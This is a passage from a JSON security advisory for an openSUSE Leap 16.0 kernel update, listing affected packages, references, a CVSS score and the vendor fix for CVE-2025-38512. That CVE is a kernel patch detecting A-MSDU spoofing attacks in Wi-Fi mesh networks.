"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "important"
}
],
"title": "CVE-2025-38511"
},
{
"cve": "CVE-2025-38512",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38512"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: prevent A-MSDU attacks in mesh networks\n\nThis patch is a mitigation to prevent the A-MSDU spoofing vulnerability\nfor mesh networks. The initial update to the IEEE 802.11 standard, in\nresponse to the FragAttacks, missed this case (CVE-2025-27558). It can\nbe considered a variant of CVE-2020-24588 but for mesh networks.\n\nThis patch tries to detect if a standard MSDU was turned into an A-MSDU\nby an adversary. This is done by parsing a received A-MSDU as a standard\nMSDU, calculating the length of the Mesh Control header, and seeing if\nthe 6 bytes after this header equal the start of an rfc1042 header. If\nequal, this is a strong indication of an ongoing attack attempt.\n\nThis defense was tested with mac80211_hwsim against a mesh network that\nuses an empty Mesh Address Extension field, i.e., when four addresses\nare used, and when using a 12-byte Mesh Address Extension field, i.e.,\nwhen six addresses are used. Functionality of normal MSDUs and A-MSDUs\nwas also tested, and confirmed working, when using both an empty and\n12-byte Mesh Address Extension field.\n\nIt was also tested with mac80211_hwsim that A-MSDU attacks in non-mesh\nnetworks keep being detected and prevented.\n\nNote that the vulnerability being patched, and the defense being\nimplemented, was also discussed in the following paper and in the\nfollowing IEEE 802.11 presentation:\n\nhttps://papers.mathyvanhoef.com/wisec2025.pdf\nhttps://mentor.ieee.org/802.11/dcn/25/11-25-0949-00-000m-a-msdu-mesh-spoof-protection.docx",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38512",
"url": "https://www.suse.com/security/cve/CVE-2025-38512"
},
{
"category": "external",
"summary": "SUSE Bug 1248178 for CVE-2025-38512",
"url": "https://bugzilla.suse.com/1248178"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
